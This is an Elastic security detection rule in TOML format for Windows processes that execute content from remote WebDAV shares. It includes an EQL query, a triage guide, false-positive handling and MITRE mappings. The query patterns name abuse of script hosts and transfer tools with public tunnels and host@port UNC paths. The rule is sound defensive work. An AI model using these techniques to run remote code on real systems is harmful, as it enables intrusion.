Suspicious Execution from a WebDav Share

  1[metadata]
  2creation_date = "2025/08/19"
  3integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
  4maturity = "production"
  5updated_date = "2026/05/03"
  6
  7[rule]
  8author = ["Elastic"]
  9description = """
 10Identifies attempts to execute or invoke content from remote WebDAV shares. Adversaries may abuse WebDAV paths,
 11public tunnels, or host@port UNC paths to run tools or scripts while reducing local staging on the victim file system.
 12"""
 13false_positives = [
 14    "Trusted WebDAV content when the command namespace, parent, utility identity, signer, user/host scope, and child/artifact/destination evidence align with a recognized workflow"
 15]
 16from = "now-9m"
 17index = [
 18    "endgame-*",
 19    "logs-crowdstrike.fdr*",
 20    "logs-endpoint.events.process-*",
 21    "logs-m365_defender.event-*",
 22    "logs-sentinel_one_cloud_funnel.*",
 23    "logs-system.security*",
 24    "logs-windows.forwarded*",
 25    "logs-windows.sysmon_operational-*",
 26    "winlogbeat-*",
 27]
 28language = "eql"
 29license = "Elastic License v2"
 30name = "Suspicious Execution from a WebDav Share"
 31risk_score = 73
 32rule_id = "ee7726cc-babc-4885-988c-f915173ac0c0"
 33severity = "high"
 34tags = [
 35    "Domain: Endpoint",
 36    "OS: Windows",
 37    "Use Case: Threat Detection",
 38    "Tactic: Execution",
 39    "Data Source: Elastic Endgame",
 40    "Data Source: Elastic Defend",
 41    "Data Source: Windows Security Event Logs",
 42    "Data Source: Microsoft Defender XDR",
 43    "Data Source: Sysmon",
 44    "Data Source: SentinelOne",
 45    "Data Source: Crowdstrike",
 46    "Resources: Investigation Guide",
 47]
 48timestamp_override = "event.ingested"
 49type = "eql"
 50
 51query = '''
 52process where host.os.type == "windows" and event.type == "start" and
 53 process.name : ("cmd.exe", "powershell.exe", "conhost.exe", "wscript.exe", "mshta.exe", "curl.exe", "msiexec.exe", "bitsadmin.exe", "net.exe") and
 54 process.command_line : ("*trycloudflare.com*", "*@SSL\\*", "*\\webdav\\*", "*\\DavWWWRoot\\*", "*\\\\*.*@8080\\*", "*\\\\*.*@80\\*", "*\\\\*.*@8443\\*", "*\\\\*.*@443\\*") and
 55 not (process.name : "cmd.exe" and process.args : "\\\\?\\UNC\\*.sharepoint.com@SSL\\DavWWWRoot\\*")
 56'''
 57
 58note = """## Triage and analysis
 59
 60### Investigating Suspicious Execution from a WebDav Share
 61
 62#### Possible investigation steps
 63
 64- Does the alert command line show direct WebDAV execution, and external delivery vs internal transfer?
 65  - Focus: `process.command_line`, `process.name`, and `process.executable`; separate public tunnel or tenant paths from internal host@port UNC, "@SSL", "DavWWWRoot", or high-port paths.
 66  - Implication: escalate when a script host, installer, shell, transfer tool, or net.exe points to public WebDAV content or an unrelated internal transfer host; lower concern when path maps to one recognized internal tenant, vendor, or deployment namespace for that role.
 67
 68- Do the launcher identity and parent lineage match that exact workflow?
 69  - Focus: `process.executable`, `process.code_signature.subject_name`, `process.code_signature.trusted`, `process.parent.executable`, and `process.parent.command_line`.
 70  - Implication: escalate when a signed utility proxies execution from a browser, Office app, chat client, archive tool, or unexplained service context. Public paths from user-facing parents suggest user delivery; internal host@port paths or net.exe share activity suggest lateral transfer. Lower concern when signer, parent, path, host, and user recur as one recognized collaboration, deployment, or support workflow; identity alone does not clear remote execution.
 71
 72- Did the alerting process spawn follow-on execution or share-mount activity?
 73  - Focus: child or sibling process starts on `host.id` where `process.parent.entity_id` matches `process.entity_id`; check shells, downloaders, installers, schedulers, net.exe, or user-writable `process.executable` paths. $investigate_2
 74  - Hint: if `process.entity_id` is unavailable, use `host.id`, `process.pid`, and a tight alert-time window; PID lineage is weaker because of reuse.
 75  - Implication: escalate when the launcher spawns download, install, persistence, or share-mapping tied to the same path; narrow scope when the chain ends cleanly inside one recognized workflow.
 76
 77- Did file telemetry show local staging or later execution from the WebDAV launch?
 78  - Focus: if file telemetry exists, query `host.id` plus `process.entity_id` for `file.path`, `file.origin_url`, `file.Ext.windows.zone_identifier`, and later starts where `process.executable` matches a written path. $investigate_3
 79  - Hint: if WebDAV content is copied locally or to a mapped drive before execution, treat it as the same delivery chain and keep original-process scope.
 80  - Range: start with the alert window; expand only after a suspicious write to confirm later execution.
 81  - Implication: escalate when the chain writes scripts, installers, renamed payloads, or startup material in user-writable paths. Missing file telemetry is unresolved, not benign; direct WebDAV execution may leave few local artifacts.
 82
 83- Did DNS or connection telemetry confirm the WebDAV endpoint or delivery infrastructure?
 84  - Focus: if network telemetry exists, separate DNS events (`dns.question.name`, `dns.resolved_ip`) from connection events (`destination.ip`, `destination.port`) for the same `host.id` and `process.entity_id`. $investigate_4
 85  - Hint: use DNS lookup_result events to map `dns.resolved_ip` to later `destination.ip` before tying a domain to a connection. Missing network telemetry is unresolved, not benign.
 86  - Implication: escalate when the process reaches public tunnels, rare external domains, high-port WebDAV services, or destinations unrelated to the signer and parent workflow; lower concern when the endpoint matches the command line's recognized tenant, internal share, or vendor.
 87
 88- If local evidence is suspicious or unresolved, do related alerts show the same WebDAV delivery or transfer pattern?
 89  - Focus: related alerts for `user.id` over 48 hours, checking reused WebDAV path, launcher, destination, or follow-on artifact. $investigate_0
 90  - Hint: if user scope is quiet or ambiguous, check `host.id` for whether the path stays local or appears with other execution or download alerts. $investigate_1
 91  - Implication: broaden scope when the same path, domain, launcher, or artifact pattern appears beyond one recognized workflow; keep the case local when related-alert history is confined to that workflow.
 92
 93- Escalate on direct remote WebDAV execution plus suspicious launcher, lineage, child, artifact, destination, or related-alert evidence; close only when process evidence and recovery align to one exact recognized workflow; preserve and escalate when answers conflict or visibility is incomplete.
 94
 95### False positive analysis
 96
 97- Tenant collaboration portals, internal WebDAV shares, and vendor content portals can trigger when `process.command_line` namespace, `process.parent.executable`, `process.executable`, signer, `user.id`, and `host.id` converge on one recognized workflow. Close only when telemetry shows parent, path, utility, user, and host stable across prior rule alerts and no child, artifact, or destination evidence contradicts the portal workflow. Use portal allowlists or owner records as corroboration, not substitutes.
 98- Deployment or remote-support tooling can run msiexec.exe, powershell.exe, cmd.exe, or bitsadmin.exe against WebDAV-hosted packages. Confirm only when a management-agent or support-console parent, utility identity, signer, package namespace, written-artifact pattern, and host/user scope fit the same workflow. Public tunnel paths, renamed payloads, unexpected children, or one-off standard-user launches remain suspicious unless externally confirmed with no telemetry contradictions.
 99- Before creating an exception, use the minimum confirmed workflow pattern: stable `process.code_signature.subject_name` or `process.executable`, `process.parent.executable`, specific `process.command_line` namespace or destination pattern, and proving `user.id` or `host.id` scope. Avoid exceptions on `process.name`, `user.name`, "@SSL", or "DavWWWRoot" alone.
100
101### Response and remediation
102
103- If confirmed benign, reverse temporary containment and document the command-line namespace, parent launcher, utility identity, signer, available destination or artifact evidence, and `user.id` / `host.id` scope that validated the workflow. Create an exception only after the same scoped pattern is stable across prior rule alerts.
104- If suspicious but unconfirmed, preserve the alert export, process tree, `process.entity_id`, `process.command_line`, `process.parent.command_line`, remote path, staged artifacts, and destination indicators before containment. First apply reversible containment, such as temporarily blocking the confirmed WebDAV namespace or increasing monitoring on affected `host.id` and `user.id`; avoid termination or deletion until child execution, payload staging, or repeated suspicious destinations indicate active compromise.
105- If confirmed malicious, isolate the host when feasible or terminate the alerting process after evidence capture. If identity evidence suggests account misuse, contain or reset the affected account with identity owners. If direct endpoint response is unavailable, hand off preserved process, artifact, destination, host, and user evidence to the team able to contain the host or account.
106- Block confirmed malicious domains, destination IPs, hashes, executable paths, and staged artifact paths. Review other hosts and users for the same `process.parent.executable` plus `process.command_line` plus destination pattern, then remove only staged scripts, installers, startup material, or persistence changes tied to the chain.
107- Post-incident hardening: restrict unnecessary WebDAV and WebClient usage, limit direct execution from remote shares by script hosts and installers, use application control or attack surface reduction where feasible, retain file and network telemetry for this workflow, and document variants such as mapped-drive execution, copied-local execution, and alternate script-host launchers.
108"""
109
110setup = """## Setup
111
112This rule is designed for data generated by [Elastic Defend](https://www.elastic.co/security/endpoint-security), which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules.
113
114Setup instructions: https://ela.st/install-elastic-defend
115
116### Additional data sources
117
118This rule also supports the following third-party data sources. For setup instructions, refer to the links below:
119
120- [CrowdStrike](https://ela.st/crowdstrike-integration)
121- [Microsoft Defender XDR](https://ela.st/m365-defender)
122- [SentinelOne Cloud Funnel](https://ela.st/sentinel-one-cloud-funnel)
123- [Sysmon Event ID 1 - Process Creation](https://ela.st/sysmon-event-1-setup)
124- [Windows Process Creation Logs](https://ela.st/audit-process-creation)
125"""
126
127[rule.investigation_fields]
128field_names = [
129    "@timestamp",
130    "host.name",
131    "host.id",
132    "user.id",
133    "process.entity_id",
134    "process.pid",
135    "process.name",
136    "process.executable",
137    "process.command_line",
138    "process.parent.executable",
139    "process.parent.command_line",
140    "process.code_signature.subject_name",
141    "process.code_signature.trusted",
142]
143
144[transform]
145
146[[transform.investigate]]
147label = "Alerts associated with the user"
148description = ""
149providers = [
150  [
151    { excluded = false, field = "event.kind", queryType = "phrase", value = "signal", valueType = "string" },
152    { excluded = false, field = "user.id", queryType = "phrase", value = "{{user.id}}", valueType = "string" }
153  ]
154]
155relativeFrom = "now-48h/h"
156relativeTo = "now"
157
158[[transform.investigate]]
159label = "Alerts associated with the host"
160description = ""
161providers = [
162  [
163    { excluded = false, field = "event.kind", queryType = "phrase", value = "signal", valueType = "string" },
164    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" }
165  ]
166]
167relativeFrom = "now-48h/h"
168relativeTo = "now"
169
170[[transform.investigate]]
171label = "Child process events from the WebDAV launcher"
172description = ""
173providers = [
174  [
175    { excluded = false, field = "event.category", queryType = "phrase", value = "process", valueType = "string" },
176    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
177    { excluded = false, field = "process.parent.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" }
178  ]
179]
180relativeFrom = "now-1h"
181relativeTo = "now"
182
183[[transform.investigate]]
184label = "File events from the WebDAV launcher"
185description = ""
186providers = [
187  [
188    { excluded = false, field = "event.category", queryType = "phrase", value = "file", valueType = "string" },
189    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
190    { excluded = false, field = "process.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" }
191  ]
192]
193relativeFrom = "now-1h"
194relativeTo = "now"
195
196[[transform.investigate]]
197label = "Network events from the WebDAV launcher"
198description = ""
199providers = [
200  [
201    { excluded = false, field = "event.category", queryType = "phrase", value = "network", valueType = "string" },
202    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
203    { excluded = false, field = "process.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" }
204  ]
205]
206relativeFrom = "now-1h"
207relativeTo = "now"
208
209[[rule.threat]]
210framework = "MITRE ATT&CK"
211
212[[rule.threat.technique]]
213id = "T1204"
214name = "User Execution"
215reference = "https://attack.mitre.org/techniques/T1204/"
216
217[[rule.threat.technique.subtechnique]]
218id = "T1204.002"
219name = "Malicious File"
220reference = "https://attack.mitre.org/techniques/T1204/002/"
221
222[rule.threat.tactic]
223id = "TA0002"
224name = "Execution"
225reference = "https://attack.mitre.org/tactics/TA0002/"
226
227[[rule.threat]]
228framework = "MITRE ATT&CK"
229
230[[rule.threat.technique]]
231id = "T1021"
232name = "Remote Services"
233reference = "https://attack.mitre.org/techniques/T1021/"
234
235[[rule.threat.technique.subtechnique]]
236id = "T1021.002"
237name = "SMB/Windows Admin Shares"
238reference = "https://attack.mitre.org/techniques/T1021/002/"
239
240[[rule.threat.technique]]
241id = "T1570"
242name = "Lateral Tool Transfer"
243reference = "https://attack.mitre.org/techniques/T1570/"
244
245[rule.threat.tactic]
246id = "TA0008"
247name = "Lateral Movement"
248reference = "https://attack.mitre.org/tactics/TA0008/"
249
250[[rule.threat]]
251framework = "MITRE ATT&CK"
252
253[[rule.threat.technique]]
254id = "T1071"
255name = "Application Layer Protocol"
256reference = "https://attack.mitre.org/techniques/T1071/"
257
258[[rule.threat.technique.subtechnique]]
259id = "T1071.001"
260name = "Web Protocols"
261reference = "https://attack.mitre.org/techniques/T1071/001/"
262
263[[rule.threat.technique]]
264id = "T1105"
265name = "Ingress Tool Transfer"
266reference = "https://attack.mitre.org/techniques/T1105/"
267
268[rule.threat.tactic]
269id = "TA0011"
270name = "Command and Control"
271reference = "https://attack.mitre.org/tactics/TA0011/"